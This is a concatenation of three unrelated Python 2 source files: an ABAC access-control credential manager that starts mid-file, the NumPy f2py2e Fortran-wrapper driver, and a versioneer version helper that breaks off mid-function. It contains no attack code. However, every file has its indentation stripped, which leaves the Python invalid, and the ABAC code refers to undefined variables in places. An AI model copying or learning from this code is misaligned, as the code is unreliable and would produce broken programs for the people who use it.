def generate_abac_credential(assertion, me_cert, me_key, id_certs):
# Create config file
id_cert_files = {'ME' : me_cert}
id_key_files = {'ME' : me_key}
config_filename, tempfiles = \
create_abac_manager_config_file(id_cert_files, id_certs, id_key_files, [])
# Make the call, pull result from stdout
chapi_home = os.getenv('CHAPIHOME')
chapi_tools = os.path.join(chapi_home, 'tools')
args = ['python', os.path.join(chapi_tools, 'ABACManager.py'),
'--config=%s' % config_filename,
'--credential=%s' % assertion]
cred = grab_output_from_subprocess(args)
# Delete the tempfiles
for tfile in tempfiles:
os.unlink(tfile)
return cred
class ABACManager:
# Constants
ten_years = 10*365*24*3600
# Constructor
# Optional arguments:
# certs_by_name : A dictionary of principal_name => cert
# cert_files_by_name : A dictionary of principal_name => cert_filename
# key_files_by_name: A dictionary of principal_name => private_key_filename
# assertions : A list of assertions as ABAC statements (X.Y<-Z e.g.)
# raw_assertions : A list of signed XML versions of ABAC statements
# assertion_files : A list of files contianing signed XML versions of ABAC statements
# options : List of command-line provided optional values
def __init__(self, certs_by_name={}, cert_files_by_name={}, \
key_files_by_name={}, \
assertions=[], raw_assertions=[], assertion_files=[], \
options=None, manage_context=True):
# For turning on/off integration with ABAC (for memory leak testing)
self._manage_context = manage_context
# For verbose debug output
self._verbose = False
# List of all ABAC principals (IDs) by name
self._ids_by_name = {}
# List of all files created from dumping certs or raw assertions
self._created_filenames = []
# The ABAC context object
self._ctxt = ABAC.Context()
# All certs provided as raw cert objects
self._certs = []
# All cert files indexed by principal name
self._cert_files = {}
# All key files indexed by principal name
self._key_files ={}
# All raw assertions (as ABAC expressions)
self._assertions = []
# All assertion files
self._assertion_files = []
# Process all the cert files
for principal_name in cert_files_by_name.keys():
cert_file = cert_files_by_name[principal_name]
principal = self.register_id(principal_name, cert_file)
# Process all the raw certs
for principal_name in certs_by_name.keys():
cert = certs_by_name[principal_name]
cert_file = self._dump_to_file(cert)
principal = self.register_id(principal_name, cert_file)
# Process the private keys
for principal_name in key_files_by_name.keys():
key_file = key_files_by_name[principal_name]
self.register_key(principal_name, key_file)
# Process all assertions
for assertion in assertions:
self.register_assertion(assertion)
# Process all raw_assertions
for raw_assertion in raw_assertions:
raw_assertion_file = self._dump_to_file(raw_assertion)
# print "Loading raw assertion file " + raw_assertion_file
self.register_assertion_file(raw_assertion_file)
# Process all assertion files
for assertion_file in assertion_files:
self.register_assertion_file(assertion_file)
# Save command-line options
self._options = options
# And process if provided
if self._options:
self.init_from_options()
# *** Hack Testing
self._all_assertions = []
self._all_links = {} # ABAC links : where can I get to from X (All Y st. Y<-X)
def init_from_options(self):
# If a config file is provided, read it into the ABACManager
if self._options.config:
cp = ConfigParser()
cp.optionxform=str
cp.read(self._options.config)
for name in cp.options('Principals'):
cert_file = cp.get('Principals', name)
self.register_id(name, cert_file)
for name in cp.options('Keys'):
key_file = cp.get('Keys', name)
self.register_key(name, key_file)
if 'Assertions' in cp.sections():
for assertion in cp.options('Assertions'):
self.register_assertion(assertion)
if 'AssertionFiles' in cp.sections():
for assertion_file in cp.options("AssertionFiles"):
self.register_assertion_file(assertion_file)
# Use all the other command-line options to override/augment
# the values in the ABCManager
# Add new principal ID's / keys
if self._options.id:
for id_filename in options.id:
parts = id_filename.split(':')
id_name = parts[0].strip()
id_cert_file = None
if len(parts) > 1:
id_cert_file = parts[1].strip()
self.register_id(id_name, id_cert_file)
id_key_file = None
if len(parts) > 2:
id_key_file = parts[2].strip()
self.register_key(name, id_key_file)
# Register assertion files provided by command line
if self._options.assertion_file:
for assertion_file in self._options.assertion_file:
self.register_assertion_file(assertion_file)
# Grab pure ABAC assertions from commandline
if self._options.assertion:
for assertion in self._options.assertion:
self.register_assertion(assertion)
# # Certs and cert_files are dictioanries of name=> cert/cert_file
# # Assertions are a list of RT0 statements
# # X.Y<-Z
# # X.Y<-Z.W
# # or RT1_lite statements (translated into RT0)
# # X.Y(S)<-Z(T)
# # X.Y(S)<-Z.W(T)
# #
# # Throw an exception if any assertion refers
# #to any object not in a provided cert/file
# def __init__(self, certs = {}, cert_files = {}, key_files = {},
# assertions = [], raw_assertions = [], assertion_files = []):
# self._certs = certs
# self._cert_files = cert_files # Indexed by principal name
# self._key_files = key_files # Indexed by principal name
# self._assertions = assertions
# self._assertion_files = assertion_files
# # dump all the certs into temp cert files and register
# for name in self._certs.keys():
# cert = self._certs[name]
# cert_filename = self._dump_to_file(cert)
# self.register_id(iname, cert_filename)
# # Add all cert_files provided
# for name in self._cert_files.keys():
# cert_filename = self._cert_files[name]
# self.register_id(name, cert_filename)
# # Generate self-signed cert if no cert file provided
# if cert_filename is None:
# id = ABAC.ID(name, self.ten_years)
# else:
# id = ABAC.ID(cert_filename)
# # If there is a key associated with this principal, load it
# if self._key_files.has_key(name):
# key_filename = self._key_files[name]
# if key_filename is not None:
# id.load_privkey(key_filename)
# self.register_id(id, name)
# # Parse and create all the assertions.
# for assertion in assertions:
# self.register_assertion(assertion)
# # Dump all raw_assertions (signed XML documents containing assertions)
# for raw_assertion in raw_assertions:
# raw_assertion_file = self._dump_to_file(raw_assertion)
# # print "Loading raw assertion file " + raw_assertion_file
# self._ctxt.load_attribute_file(raw_assertion_file)
# # Register assertions from files
# for assertion_file in assertion_files:
# # print "Loading assertion file " + assertion_file
# self._ctxt.load_attribute_file(assertion_file)
def run(self):
if self._options.query:
ok, proof = self.query(self._options.query)
if ok:
print "Succeeded"
else:
print "Failed"
print "\n".join(self.pretty_print_proof(proof))
else:
assertion = self.register_assertion(self._options.credential)
self._dump_assertion(assertion, self._options.outfile)
# Traverse tree of ABAC expression finding path leading from 'from_expr' to 'to_expr'
# *** Hack
def find_path(self, from_expr, to_expr):
if from_expr not in self._all_links: return False
if to_expr in self._all_links[from_expr]: return True
for link in self._all_links[from_expr]:
if self.find_path(link, to_expr):
return True
return False
# Does given target have given role?
# I.e. can we prove query statement Q (X.role<-target)
# Return ok, proof
def query(self, query_expression):
# *** Hack ***
# Sorry you gotta parse the expressions and go head-to-tail...
if not self._manage_context:
parts = query_expression.split('<-')
lhs = parts[0]
rhs = parts[1]
response = self.find_path(rhs, lhs)
return response, None
query_expression = str(query_expression) # Avoid unicode
query_expression_parts = query_expression.split("<-")
if len(query_expression_parts) != 2:
raise Exception("Illegal query expression : " + query_expression)
query_lhs = query_expression_parts[0].strip()
query_lhs_parts = query_lhs.split(".")
if len(query_lhs_parts) != 2:
raise Exception("Illegal query expression : " + query_expression)
signer = query_lhs_parts[0].strip()
signer_keyid = self._resolve_principal(signer).keyid()
role_name = query_lhs_parts[1].strip()
role = self._resolve_role(role_name)
query_rhs = query_expression_parts[1].strip()
target_name = query_rhs
target = self._resolve_principal(target_name)
resolved_query_expression = "%s.%s" % (signer_keyid, role)
ok, proof = self._ctxt.query(resolved_query_expression, target.keyid())
return ok, proof
# Delete all the tempfiles create
def __del__(self):
del self._ctxt
for created_filename in self._created_filenames:
os.remove(created_filename)
# Register a new ID with the manager, loading into lookup table and context
def register_id(self, name, cert_file):
# *** Hack ***
if not self._manage_context:
return
if cert_file == '' or cert_file == 'None':
cert_file = None
if cert_file:
id = ABAC.ID(cert_file)
else:
id = ABAC.ID(name, self.ten_years)
if self._verbose:
chapi_audit_and_log('ABAC', "Registering ID: " + name + " " + str(cert_file))
if self._ids_by_name.has_key(name):
raise Exception("ABACManager: name doubley defined " + name)
self._ids_by_name[name] = id
self._ctxt.load_id_chunk(id.cert_chunk())
# Load a private key with a principal
def register_key(self, name, key_file):
# *** Hack ***
if not self._manage_context:
return
if key_file and key_file != '' and key_file != 'None':
id = self._ids_by_name[name]
id.load_privkey(key_file)
if self._verbose:
chapi_audit_and_log('ABAC', "Registering key " + name + " " + key_file)
# Register a new assertion with the manager
# Parse the expression and resolve the pieces
# into RT1_line/RT0 roles and principal keyids
# Generate exception if a principal is referenced but not registered
def register_assertion(self, assertion):
if self._verbose:
chapi_audit_and_log('ABAC', "Registering assertion " + assertion)
# *** Hack ***
if not self._manage_context:
self._all_assertions.append(assertion)
parts = assertion.split('<-')
subject_role= parts[0]
principal = parts[1]
if principal not in self._all_links: self._all_links[principal] = []
self._all_links[principal].append(subject_role)
return # *** HACK
assertion = str(assertion) # Avoid unicode
assertion_pieces = assertion.split("<-")
if len(assertion_pieces) != 2:
raise Exception("Ill-formed assertion: need exactly 1 <- : " \
+ assertion)
lhs = assertion_pieces[0].strip()
rhs = assertion_pieces[1].strip()
lhs_pieces = lhs.split('.')
if len(lhs_pieces) != 2:
raise Exception("Ill-formed assertion LHS: need exactly 1 . : " \
+ lhs)
subject = self._resolve_principal(lhs_pieces[0])
role = self._resolve_role(lhs_pieces[1])
lhs_pieces = lhs.split('.')
P = ABAC.Attribute(subject, role, self.ten_years)
rhs_pieces = rhs.split('.')
if len(rhs_pieces) >= 1:
principal_name = rhs_pieces[0].strip()
object = self._resolve_principal(principal_name)
if len(rhs_pieces) == 1:
P.principal(object.keyid())
elif len(rhs_pieces) == 2:
role_name = rhs_pieces[1].strip()
role = self._resolve_role(role_name)
P.role(object.keyid(), role)
elif len(rhs_pieces) == 3:
# Linking role
role1 = rhs_pieces[1].strip()
role2 = rhs_pieces[2].strip()
linking_role_left = self._resolve_role(role1)
linking_role_right = self._resolve_role(role2)
P.linking_role(object.keyid(), linking_role_left,linking_role_right)
else:
raise Exception("Ill-formed assertion RHS: need < 2 . : " + rhs)
P.bake()
self._ctxt.load_attribute_chunk(P.cert_chunk())
self._assertions.append(assertion)
return P
def register_assertion_file(self, assertion_file):
if self._verbose:
chapi_audit_and_log('ABAC', "Registering assertion file " + assertion_file)
self._assertion_files.append(assertion_file)
if self._manage_context:
self._ctxt.load_attribute_file(assertion_file)
# return list of user-readable credentials in proof chain
def pretty_print_proof(self, proof):
proof_texts = \
["%s<-%s" % \
(self._transform_string(elt.head().string()), \
self._transform_string(elt.tail().string())) \
for elt in proof]
return proof_texts
# Some internal helper functions
# Dump a cert or credential to a file, returning filename
def _dump_to_file(self, contents):
(fd, filename) = tempfile.mkstemp()
os.close(fd)
file = open(filename, 'w')
file.write(contents)
file.close()
self._created_filenames.append(filename)
return filename
# Dump an assertion to stdout or a file,
# depending on whether outfile_name is set
def _dump_assertion(self, assertion, outfile_name):
outfile = sys.stdout
if outfile_name:
try:
outfile = open(outfile_name, 'w')
except Exception:
print "Can't open outfile " + options.outfile
sys.exit(-1)
assertion.write(outfile)
if outfile_name:
outfile.close()
# Lookup principal by name and return
# Raise exception if not found
def _resolve_principal(self, name):
if self._ids_by_name.has_key(name):
return self._ids_by_name[name]
else:
raise Exception("Unregistered principal: " + name)
# Resolve a role string into RT1_lite syntax
# I.e.
# R => R (where R is a simple non-parenthesized string)
# R(S) => R_S.keyid() where S is the name of principal
def _resolve_role(self, role):
has_lpar = role.find("(")
has_rpar = role.find(")")
if has_lpar < 0and has_rpar < 0:
return role
elif has_lpar >- 0 and has_rpar >= 0 and has_lpar < has_rpar:
role_parts = role.split('(')
role_name = role_parts[0].strip()
object_parts = role_parts[1].split(')')
object_name = object_parts[0].strip()
object = self._resolve_principal(object_name)
return "%s_%s" % (role_name, object.keyid())
else:
raise Exception("Ill-formed role: " + role)
# Replace keyids with string names in string
def _transform_string(self, string):
for id_name in self._ids_by_name.keys():
id = self._ids_by_name[id_name]
id_keyid = id.keyid()
string = string.replace(id_keyid, id_name)
return string
def main(argv=sys.argv):
parser = optparse.OptionParser(description='Produce an ABAC Assertion')
parser.add_option("--assertion",
help="ABAC-style assertion",
action = 'append',
default=[])
parser.add_option("--assertion_file",
help="file containing ABAC assertion",
default = [])
parser.add_option("--id", action='append',
help="Identifier name (self-signed case) or " +
"name:cert_file (externally signed case")
parser.add_option("--credential",
help="Expression of ABAC statement for which to generate signed credential")
parser.add_option("--query", help="Query expression to evaluate")
parser.add_option('--outfile',
help="name of file to put signed XML contents of credential (default=stdout)")
parser.add_option('--config',
help="Name of config file with Principals/Keys/Assertions/AssertionFiles sections",
default = None)
(options, args) = parser.parse_args(argv)
# We need either a query or credential expression
if not options.query and not options.credential:
parser.print_help()
sys.exit(-1)
manager = ABACManager(options=options)
manager._verbose = True
manager.run()
if __name__ == "__main__":
main()
sys.exit(0)
|
|
#!/usr/bin/env python
"""
f2py2e - Fortran to Python C/API generator. 2nd Edition.
See __usage__ below.
Copyright 1999--2005 Pearu Peterson all rights reserved,
Pearu Peterson <pearu@cens.ioc.ee>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/05/06 08:31:19 $
Pearu Peterson
"""
__version__ = "$Revision: 1.90 $"[10:-1]
import __version__
f2py_version = __version__.version
import sys
import os
import pprint
import types
import re
errmess=sys.stderr.write
#outmess=sys.stdout.write
show=pprint.pprint
import crackfortran
import rules
import cb_rules
import auxfuncs
import cfuncs
import f90mod_rules
outmess = auxfuncs.outmess
try:
from numpy import __version__ as numpy_version
except ImportError:
numpy_version = 'N/A'
__usage__ = """\
Usage:
1) To construct extension module sources:
f2py [<options>] <fortran files> [[[only:]||[skip:]] \\
<fortran functions> ] \\
[: <fortran files> ...]
2) To compile fortran files and build extension modules:
f2py -c [<options>, <build_flib options>, <extra options>] <fortran files>
3) To generate signature files:
f2py -h <filename.pyf> ...< same options as in (1) >
Description: This program generates a Python C/API file (<modulename>module.c)
that contains wrappers for given fortran functions so that they
can be called from Python. With the -c option the corresponding
extension modules are built.
Options:
--2d-numpy Use numpy.f2py tool with NumPy support. [DEFAULT]
--2d-numeric Use f2py2e tool with Numeric support.
--2d-numarray Use f2py2e tool with Numarray support.
--g3-numpy Use 3rd generation f2py from the separate f2py package.
[NOT AVAILABLE YET]
-h <filename> Write signatures of the fortran routines to file <filename>
and exit. You can then edit <filename> and use it instead
of <fortran files>. If <filename>==stdout then the
signatures are printed to stdout.
<fortran functions> Names of fortran routines for which Python C/API
functions will be generated. Default is all that are found
in <fortran files>.
<fortran files> Paths to fortran/signature files that will be scanned for
<fortran functions> in order to determine their signatures.
skip: Ignore fortran functions that follow until `:'.
only: Use only fortran functions that follow until `:'.
: Get back to <fortran files> mode.
-m <modulename> Name of the module; f2py generates a Python/C API
file <modulename>module.c or extension module <modulename>.
Default is 'untitled'.
--[no-]lower Do [not] lower the cases in <fortran files>. By default,
--lower is assumed with -h key, and --no-lower without -h key.
--build-dir <dirname> All f2py generated files are created in <dirname>.
Default is tempfile.mktemp().
--overwrite-signature Overwrite existing signature file.
--[no-]latex-doc Create (or not) <modulename>module.tex.
Default is --no-latex-doc.
--short-latex Create 'incomplete' LaTeX document (without commands
\\documentclass, \\tableofcontents, and \\begin{document},
\\end{document}).
--[no-]rest-doc Create (or not) <modulename>module.rst.
Default is --no-rest-doc.
--debug-capi Create C/API code that reports the state of the wrappers
during runtime. Useful for debugging.
--[no-]wrap-functions Create Fortran subroutine wrappers to Fortran 77
functions. --wrap-functions is default because it ensures
maximum portability/compiler independence.
--include_paths <path1>:<path2>:... Search include files from the given
directories.
--help-link [..] List system resources found by system_info.py. See also
--link-<resource> switch below. [..] is optional list
of resources names. E.g. try 'f2py --help-link lapack_opt'.
--quiet Run quietly.
--verbose Run with extra verbosity.
-v Print f2py version ID and exit.
numpy.distutils options (only effective with -c):
--fcompiler= Specify Fortran compiler type by vendor
--compiler= Specify C compiler type (as defined by distutils)
--help-fcompiler List available Fortran compilers and exit
--f77exec= Specify the path to F77 compiler
--f90exec= Specify the path to F90 compiler
--f77flags= Specify F77 compiler flags
--f90flags= Specify F90 compiler flags
--opt= Specify optimization flags
--arch= Specify architecture specific optimization flags
--noopt Compile without optimization
--noarch Compile without arch-dependent optimization
--debug Compile with debugging information
Extra options (only effective with -c):
--link-<resource> Link extension module with <resource> as defined
by numpy.distutils/system_info.py. E.g. to link
with optimized LAPACK libraries (vecLib on MacOSX,
ATLAS elsewhere), use --link-lapack_opt.
See also --help-link switch.
-L/path/to/lib/ -l<libname>
-D<define> -U<name>
-I/path/to/include/
<filename>.o <filename>.so <filename>.a
Using the following macros may be required with non-gcc Fortran
compilers:
-DPREPEND_FORTRAN -DNO_APPEND_FORTRAN -DUPPERCASE_FORTRAN
-DUNDERSCORE_G77
When using -DF2PY_REPORT_ATEXIT, a performance report of F2PY
interface is printed out at exit (platforms: Linux).
When using -DF2PY_REPORT_ON_ARRAY_COPY=<int>, a message is
sent to stderr whenever F2PY interface makes a copy of an
array. Integer <int> sets the threshold for array sizes when
a message should be shown.
Version: %s
numpy Version: %s
Requires: Python 2.3 or higher.
License: NumPy license (see LICENSE.txt in the NumPy source code)
Copyright 1999 - 2005 Pearu Peterson all rights reserved.
http://cens.ioc.ee/projects/f2py2e/"""%(f2py_version, numpy_version)
def scaninputline(inputline):
files,funcs,skipfuncs,onlyfuncs,debug=[],[],[],[],[]
f,f2,f3,f4,f5,f6,f7=1,0,0,0,0,0,0
verbose = 1
dolc=-1
dolatexdoc = 0
dorestdoc = 0
wrapfuncs = 1
buildpath = '.'
include_paths = []
signsfile,modulename=None,None
options = {'buildpath':buildpath}
for l in inputline:
if l=='': pass
elif l=='only:': f=0
elif l=='skip:': f=-1
elif l==':': f=1;f4=0
elif l[:8]=='--debug-': debug.append(l[8:])
elif l=='--lower': dolc=1
elif l=='--build-dir': f6=1
elif l=='--no-lower': dolc=0
elif l=='--quiet': verbose = 0
elif l=='--verbose': verbose += 1
elif l=='--latex-doc': dolatexdoc=1
elif l=='--no-latex-doc': dolatexdoc=0
elif l=='--rest-doc': dorestdoc=1
elif l=='--no-rest-doc': dorestdoc=0
elif l=='--wrap-functions': wrapfuncs=1
elif l=='--no-wrap-functions': wrapfuncs=0
elif l=='--short-latex': options['shortlatex']=1
elif l=='--overwrite-signature': options['h-overwrite']=1
elif l=='-h': f2=1
elif l=='-m': f3=1
elif l[:2]=='-v':
print f2py_version
sys.exit()
elif l=='--show-compilers':
f5=1
elif l[:8]=='-include':
cfuncs.outneeds['userincludes'].append(l[9:-1])
cfuncs.userincludes[l[9:-1]]='#include '+l[8:]
elif l[:15]=='--include_paths':
f7=1
elif l[0]=='-':
errmess('Unknown option %s\n'%`l`)
sys.exit()
elif f2: f2=0;signsfile=l
elif f3: f3=0;modulename=l
elif f6: f6=0;buildpath=l
elif f7: f7=0;include_paths.extend(l.split(os.pathsep))
elif f==1:
try:
open(l).close()
files.append(l)
except IOError,detail:
errmess('IOError: %s. Skipping file "%s".\n'%(str(detail),l))
elif f==-1: skipfuncs.append(l)
elif f==0: onlyfuncs.append(l)
if not f5 and not files and not modulename:
print __usage__
sys.exit()
if not os.path.isdir(buildpath):
if not verbose:
outmess('Creating build directory %s'%(buildpath))
os.mkdir(buildpath)
if signsfile:
signsfile = os.path.join(buildpath,signsfile)
if signsfile and os.path.isfile(signsfile) and 'h-overwrite' not in options:
errmess('Signature file "%s" exists!!! Use --overwrite-signature to overwrite.\n'%(signsfile))
sys.exit()
options['debug']=debug
options['verbose']=verbose
if dolc==-1 and not signsfile: options['do-lower']=0
else: options['do-lower']=dolc
if modulename: options['module']=modulename
if signsfile: options['signsfile']=signsfile
if onlyfuncs: options['onlyfuncs']=onlyfuncs
if skipfuncs: options['skipfuncs']=skipfuncs
options['dolatexdoc'] = dolatexdoc
options['dorestdoc'] = dorestdoc
options['wrapfuncs'] = wrapfuncs
options['buildpath']=buildpath
options['include_paths']=include_paths
return files,options
def callcrackfortran(files,options):
rules.options=options
funcs=[]
crackfortran.debug=options['debug']
crackfortran.verbose=options['verbose']
if 'module' in options:
crackfortran.f77modulename=options['module']
if 'skipfuncs' in options:
crackfortran.skipfuncs=options['skipfuncs']
if 'onlyfuncs' in options:
crackfortran.onlyfuncs=options['onlyfuncs']
crackfortran.include_paths[:]=options['include_paths']
crackfortran.dolowercase=options['do-lower']
postlist=crackfortran.crackfortran(files)
if 'signsfile' in options:
outmess('Saving signatures to file "%s"\n'%(options['signsfile']))
pyf=crackfortran.crack2fortran(postlist)
if options['signsfile'][-6:]=='stdout':
sys.stdout.write(pyf)
else:
f=open(options['signsfile'],'w')
f.write(pyf)
f.close()
return postlist
def buildmodules(lst):
cfuncs.buildcfuncs()
outmess('Building modules...\n')
modules,mnames,isusedby=[],[],{}
for i in range(len(lst)):
if '__user__' in lst[i]['name']:
cb_rules.buildcallbacks(lst[i])
else:
if 'use' in lst[i]:
for u in lst[i]['use'].keys():
if u not in isusedby:
isusedby[u]=[]
isusedby[u].append(lst[i]['name'])
modules.append(lst[i])
mnames.append(lst[i]['name'])
ret = {}
for i in range(len(mnames)):
if mnames[i] in isusedby:
outmess('\tSkipping module "%s" which is used by %s.\n'%(mnames[i],','.join(map(lambda s:'"%s"'%s,isusedby[mnames[i]]))))
else:
um=[]
if 'use' in modules[i]:
for u in modules[i]['use'].keys():
if u in isusedby and u in mnames:
um.append(modules[mnames.index(u)])
else:
outmess('\tModule "%s" uses nonexisting "%s" which will be ignored.\n'%(mnames[i],u))
ret[mnames[i]] = {}
dict_append(ret[mnames[i]],rules.buildmodule(modules[i],um))
return ret
def dict_append(d_out,d_in):
for (k,v) in d_in.items():
if k not in d_out:
d_out[k] = []
if type(v) is types.ListType:
d_out[k] = d_out[k] + v
else:
d_out[k].append(v)
def run_main(comline_list):
"""Run f2py as if string.join(comline_list,' ') is used as a command line.
In case of using -h flag, return None.
"""
if sys.version_info[0] >= 3:
import imp
imp.reload(crackfortran)
else:
reload(crackfortran)
f2pydir=os.path.dirname(os.path.abspath(cfuncs.__file__))
fobjhsrc = os.path.join(f2pydir,'src','fortranobject.h')
fobjcsrc = os.path.join(f2pydir,'src','fortranobject.c')
files,options=scaninputline(comline_list)
auxfuncs.options=options
postlist=callcrackfortran(files,options)
isusedby={}
for i in range(len(postlist)):
if 'use' in postlist[i]:
for u in postlist[i]['use'].keys():
if u not in isusedby:
isusedby[u]=[]
isusedby[u].append(postlist[i]['name'])
for i in range(len(postlist)):
if postlist[i]['block']=='python module' and '__user__' in postlist[i]['name']:
if postlist[i]['name'] in isusedby:
#if not quiet:
outmess('Skipping Makefile build for module "%s" which is used by %s\n'%(postlist[i]['name'],','.join(map(lambda s:'"%s"'%s,isusedby[postlist[i]['name']]))))
if 'signsfile' in options:
if options['verbose']>1:
outmess('Stopping. Edit the signature file and then run f2py on the signature file: ')
outmess('%s %s\n'%(os.path.basename(sys.argv[0]),options['signsfile']))
return
for i in range(len(postlist)):
if postlist[i]['block']!='python module':
if 'python module' not in options:
errmess('Tip: If your original code is Fortran source then you must use -m option.\n')
raise TypeError,'All blocks must be python module blocks but got %s'%(`postlist[i]['block']`)
auxfuncs.debugoptions=options['debug']
f90mod_rules.options=options
auxfuncs.wrapfuncs=options['wrapfuncs']
ret=buildmodules(postlist)
for mn in ret.keys():
dict_append(ret[mn],{'csrc':fobjcsrc,'h':fobjhsrc})
return ret
def filter_files(prefix,suffix,files,remove_prefix=None):
"""
Filter files by prefix and suffix.
"""
filtered,rest = [],[]
match = re.compile(prefix+r'.*'+suffix+r'\Z').match
if remove_prefix:
ind = len(prefix)
else:
ind = 0
for file in [x.strip() for x in files]:
if match(file): filtered.append(file[ind:])
else: rest.append(file)
return filtered,rest
def get_prefix(module):
p = os.path.dirname(os.path.dirname(module.__file__))
return p
def run_compile():
"""
Do it all in one call!
"""
import tempfile
i = sys.argv.index('-c')
del sys.argv[i]
remove_build_dir = 0
try: i = sys.argv.index('--build-dir')
except ValueError: i=None
if i is not None:
build_dir = sys.argv[i+1]
del sys.argv[i+1]
del sys.argv[i]
else:
remove_build_dir = 1
build_dir = os.path.join(tempfile.mktemp())
sysinfo_flags = filter(re.compile(r'[-][-]link[-]').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=sysinfo_flags:a not in flags,sys.argv)
if sysinfo_flags:
sysinfo_flags = [f[7:] for f in sysinfo_flags]
f2py_flags = filter(re.compile(r'[-][-]((no[-]|)(wrap[-]functions|lower)|debug[-]capi|quiet)|[-]include').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=f2py_flags:a not in flags,sys.argv)
f2py_flags2 = []
fl = 0
for a in sys.argv[1:]:
if a in ['only:','skip:']:
fl = 1
elif a==':':
fl = 0
if fl or a==':':
f2py_flags2.append(a)
if f2py_flags2 and f2py_flags2[-1]!=':':
f2py_flags2.append(':')
f2py_flags.extend(f2py_flags2)
sys.argv = filter(lambda a,flags=f2py_flags2:a not in flags,sys.argv)
flib_flags = filter(re.compile(r'[-][-]((f(90)?compiler([-]exec|)|compiler)=|help[-]compiler)').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=flib_flags:a not in flags,sys.argv)
fc_flags = filter(re.compile(r'[-][-]((f(77|90)(flags|exec)|opt|arch)=|(debug|noopt|noarch|help[-]fcompiler))').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=fc_flags:a not in flags,sys.argv)
if 1:
del_list = []
for s in flib_flags:
v = '--fcompiler='
if s[:len(v)]==v:
from numpy.distutils import fcompiler
fcompiler.load_all_fcompiler_classes()
allowed_keys = fcompiler.fcompiler_class.keys()
nv = ov = s[len(v):].lower()
if ov not in allowed_keys:
vmap = {} # XXX
try:
nv = vmap[ov]
except KeyError:
if ov not in vmap.values():
print 'Unknown vendor: "%s"' % (s[len(v):])
nv = ov
i = flib_flags.index(s)
flib_flags[i] = '--fcompiler=' + nv
continue
for s in del_list:
i = flib_flags.index(s)
del flib_flags[i]
assert len(flib_flags)<=2,`flib_flags`
setup_flags = filter(re.compile(r'[-][-](verbose)').match,sys.argv[1:])
sys.argv = filter(lambda a,flags=setup_flags:a not in flags,sys.argv)
if '--quiet' in f2py_flags:
setup_flags.append('--quiet')
modulename = 'untitled'
sources = sys.argv[1:]
if '-m' in sys.argv:
i = sys.argv.index('-m')
modulename = sys.argv[i+1]
del sys.argv[i+1],sys.argv[i]
sources = sys.argv[1:]
else:
from numpy.distutils.command.build_src import get_f2py_modulename
pyf_files,sources = filter_files('','[.]pyf([.]src|)',sources)
sources = pyf_files + sources
for f in pyf_files:
modulename = get_f2py_modulename(f)
if modulename:
break
extra_objects, sources = filter_files('','[.](o|a|so)',sources)
include_dirs, sources = filter_files('-I','',sources,remove_prefix=1)
library_dirs, sources = filter_files('-L','',sources,remove_prefix=1)
libraries, sources = filter_files('-l','',sources,remove_prefix=1)
undef_macros, sources = filter_files('-U','',sources,remove_prefix=1)
define_macros, sources = filter_files('-D','',sources,remove_prefix=1)
using_numarray = 0
using_numeric = 0
for i in range(len(define_macros)):
name_value = define_macros[i].split('=',1)
if len(name_value)==1:
name_value.append(None)
if len(name_value)==2:
define_macros[i] = tuple(name_value)
else:
print 'Invalid use of -D:',name_value
from numpy.distutils.system_info import get_info
num_include_dir = None
num_info = {}
#import numpy
#n = 'numpy'
#p = get_prefix(numpy)
#from numpy.distutils.misc_util import get_numpy_include_dirs
#num_info = {'include_dirs': get_numpy_include_dirs()}
if num_info:
include_dirs.extend(num_info.get('include_dirs',[]))
from numpy.distutils.core import setup,Extension
ext_args = {'name':modulename,'sources':sources,
'include_dirs': include_dirs,
'library_dirs': library_dirs,
'libraries': libraries,
'define_macros': define_macros,
'undef_macros': undef_macros,
'extra_objects': extra_objects,
'f2py_options': f2py_flags,
}
if sysinfo_flags:
from numpy.distutils.misc_util import dict_append
for n in sysinfo_flags:
i = get_info(n)
if not i:
outmess('No %s resources found in system'\
' (try `f2py --help-link`)\n' % (`n`))
dict_append(ext_args,**i)
ext = Extension(**ext_args)
sys.argv = [sys.argv[0]] + setup_flags
sys.argv.extend(['build',
'--build-temp',build_dir,
'--build-base',build_dir,
'--build-platlib','.'])
if fc_flags:
sys.argv.extend(['config_fc']+fc_flags)
if flib_flags:
sys.argv.extend(['build_ext']+flib_flags)
setup(ext_modules = [ext])
if remove_build_dir and os.path.exists(build_dir):
import shutil
outmess('Removing build directory %s\n'%(build_dir))
shutil.rmtree(build_dir)
def main():
if '--help-link' in sys.argv[1:]:
sys.argv.remove('--help-link')
from numpy.distutils.system_info import show_all
show_all()
return
if '-c' in sys.argv[1:]:
run_compile()
else:
run_main(sys.argv[1:])
#if __name__ == "__main__":
# main()
# EOF
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.15 (https://github.com/warner/python-versioneer)
import errno
import os
import re
import subprocess
import sys
def get_keywords():
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
keywords = {"refnames": git_refnames, "full": git_full}
return keywords
class VersioneerConfig:
pass
def get_config():
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "xray_vision/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
pass
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
def decorate(f):
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False):
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None
else:
if verbose:
